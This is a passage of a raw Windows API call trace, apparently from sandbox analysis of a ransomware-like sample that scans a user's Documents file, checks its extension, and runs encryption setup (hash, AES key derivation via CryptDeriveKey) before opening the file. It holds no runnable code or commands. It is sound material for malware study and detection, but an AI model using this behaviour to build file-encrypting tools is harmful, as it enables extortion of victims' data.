ftLastWriteTime.dwLowDateTime=0x96ac91b0, ftLastWriteTime.dwHighDateTime=0x1d5dda2, nFileSizeHigh=0x0, nFileSizeLow=0x9f51, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="hvT5kT0PFopfwSD QzN.pps", cAlternateFileName="HVT5KT~1.PPS")) returned 0x90add8 [0178.099] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0178.099] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0178.099] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\hvT5kT0PFopfwSD QzN.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.099] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\hvT5kT0PFopfwSD QzN.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.099] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\hvT5kT0PFopfwSD QzN.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.099] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\hvT5kT0PFopfwSD QzN.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.099] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\hvT5kT0PFopfwSD QzN.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.099] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\hvT5kT0PFopfwSD QzN.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.099] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\hvT5kT0PFopfwSD QzN.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.099] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\hvT5kT0PFopfwSD QzN.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.099] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\hvT5kT0PFopfwSD QzN.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.099] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\hvT5kT0PFopfwSD QzN.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.099] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\hvT5kT0PFopfwSD QzN.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.099] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\hvT5kT0PFopfwSD QzN.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.099] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\hvT5kT0PFopfwSD QzN.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.099] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\hvT5kT0PFopfwSD QzN.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.099] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\hvT5kT0PFopfwSD QzN.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.099] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\hvT5kT0PFopfwSD QzN.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.099] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\hvT5kT0PFopfwSD QzN.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.099] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\hvT5kT0PFopfwSD QzN.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.100] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\hvT5kT0PFopfwSD QzN.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.100] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\hvT5kT0PFopfwSD QzN.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.100] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\hvT5kT0PFopfwSD QzN.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.100] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\hvT5kT0PFopfwSD QzN.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.100] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\hvT5kT0PFopfwSD QzN.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.100] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Documents\\x6khSA9uDUZMBxf\\hvT5kT0PFopfwSD QzN.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.100] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Documents\\x6khSA9uDUZMBxf\\hvT5kT0PFopfwSD QzN.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.100] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Documents\\x6khSA9uDUZMBxf\\hvT5kT0PFopfwSD QzN.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.100] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Documents\\x6khSA9uDUZMBxf\\hvT5kT0PFopfwSD QzN.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.100] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Documents\\x6khSA9uDUZMBxf\\hvT5kT0PFopfwSD QzN.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.100] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Documents\\x6khSA9uDUZMBxf\\hvT5kT0PFopfwSD QzN.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.100] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Documents\\x6khSA9uDUZMBxf\\hvT5kT0PFopfwSD QzN.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.100] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Documents\\x6khSA9uDUZMBxf\\hvT5kT0PFopfwSD QzN.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.100] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Documents\\x6khSA9uDUZMBxf\\hvT5kT0PFopfwSD QzN.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.100] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocuments\\x6khSA9uDUZMBxf\\hvT5kT0PFopfwSD QzN.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.100] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cuments\\x6khSA9uDUZMBxf\\hvT5kT0PFopfwSD QzN.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.100] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uments\\x6khSA9uDUZMBxf\\hvT5kT0PFopfwSD QzN.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.100] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ments\\x6khSA9uDUZMBxf\\hvT5kT0PFopfwSD QzN.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.100] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ents\\x6khSA9uDUZMBxf\\hvT5kT0PFopfwSD QzN.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.100] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nts\\x6khSA9uDUZMBxf\\hvT5kT0PFopfwSD QzN.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.100] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts\\x6khSA9uDUZMBxf\\hvT5kT0PFopfwSD QzN.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.100] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\x6khSA9uDUZMBxf\\hvT5kT0PFopfwSD QzN.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.100] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\x6khSA9uDUZMBxf\\hvT5kT0PFopfwSD QzN.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.100] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x6khSA9uDUZMBxf\\hvT5kT0PFopfwSD QzN.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.100] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6khSA9uDUZMBxf\\hvT5kT0PFopfwSD QzN.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.100] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="khSA9uDUZMBxf\\hvT5kT0PFopfwSD QzN.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.100] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hSA9uDUZMBxf\\hvT5kT0PFopfwSD QzN.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.100] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SA9uDUZMBxf\\hvT5kT0PFopfwSD QzN.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.100] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="A9uDUZMBxf\\hvT5kT0PFopfwSD QzN.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.100] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9uDUZMBxf\\hvT5kT0PFopfwSD QzN.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.100] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uDUZMBxf\\hvT5kT0PFopfwSD QzN.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.100] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUZMBxf\\hvT5kT0PFopfwSD QzN.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.101] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UZMBxf\\hvT5kT0PFopfwSD QzN.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.101] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZMBxf\\hvT5kT0PFopfwSD QzN.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.101] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBxf\\hvT5kT0PFopfwSD QzN.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.101] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Bxf\\hvT5kT0PFopfwSD QzN.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.101] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xf\\hvT5kT0PFopfwSD QzN.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.101] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f\\hvT5kT0PFopfwSD QzN.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.101] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\hvT5kT0PFopfwSD QzN.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.101] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hvT5kT0PFopfwSD QzN.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.101] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vT5kT0PFopfwSD QzN.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.101] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="T5kT0PFopfwSD QzN.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.101] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5kT0PFopfwSD QzN.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.101] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kT0PFopfwSD QzN.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.101] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="T0PFopfwSD QzN.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.101] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0PFopfwSD QzN.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.101] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PFopfwSD QzN.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.101] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FopfwSD QzN.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.101] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="opfwSD QzN.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.101] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pfwSD QzN.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.101] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fwSD QzN.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.101] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wSD QzN.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.101] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SD QzN.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.101] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="D QzN.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.101] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0178.101] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0178.101] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0178.101] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0178.101] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0178.101] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ps", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0178.102] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pps", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0178.102] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pps", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0178.102] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0178.102] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0178.102] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0178.102] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0178.102] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.102] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\hvT5kT0PFopfwSD QzN.pps", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9a0ad840, ftCreationTime.dwHighDateTime=0x1d5e7b0, ftLastAccessTime.dwLowDateTime=0x96ac91b0, ftLastAccessTime.dwHighDateTime=0x1d5dda2, ftLastWriteTime.dwLowDateTime=0x96ac91b0, ftLastWriteTime.dwHighDateTime=0x1d5dda2, nFileSizeHigh=0x0, nFileSizeLow=0x9f51, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="hvT5kT0PFopfwSD QzN.pps", cAlternateFileName="HVT5KT~1.PPS")) returned 0x90ae18 [0178.102] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0178.102] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.102] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0178.102] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.102] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0178.102] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0178.102] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.102] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0178.103] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.103] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.103] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0178.114] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0178.114] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0178.114] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0b78) returned 1 [0178.115] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0178.115] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0178.115] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0178.115] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0178.115] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0178.115] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0178.115] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0178.115] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0178.115] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0178.115] CryptCreateHash (in: hProv=0x9c0b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0178.115] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0178.115] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0178.115] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0178.115] CryptHashData (hHash=0x90af58, pbData=0x8dee70, dwDataLen=0x19, dwFlags=0x1) returned 1 [0178.115] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0178.115] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0178.115] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0178.116] CryptDeriveKey (in: hProv=0x9c0b78, Algid=0x660e, hBaseData=0x90af58, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90af98) returned 1 [0178.116] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0178.116] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0178.116] CryptDestroyHash (hHash=0x90af58) returned 1 [0178.117] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\hvT5kT0PFopfwSD QzN.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x6khsa9uduzmbxf\\hvt5kt0pfopfwsd qzn.pps"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0178.117] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0178.117] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0178.117] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0178.117] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0178.117] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0178.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0178.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0178.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0178.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0178.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0178.117] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0178.117] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0178.117] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0178.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0178.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0178.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0178.117] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0178.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0178.118] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0178.118] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0178.118] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0178.118] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0178.118] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0178.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0178.118] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0178.118] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0178.118] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0178.118] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0178.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0178.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0178.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0178.118] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0178.118] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0178.118] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0178.118] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, 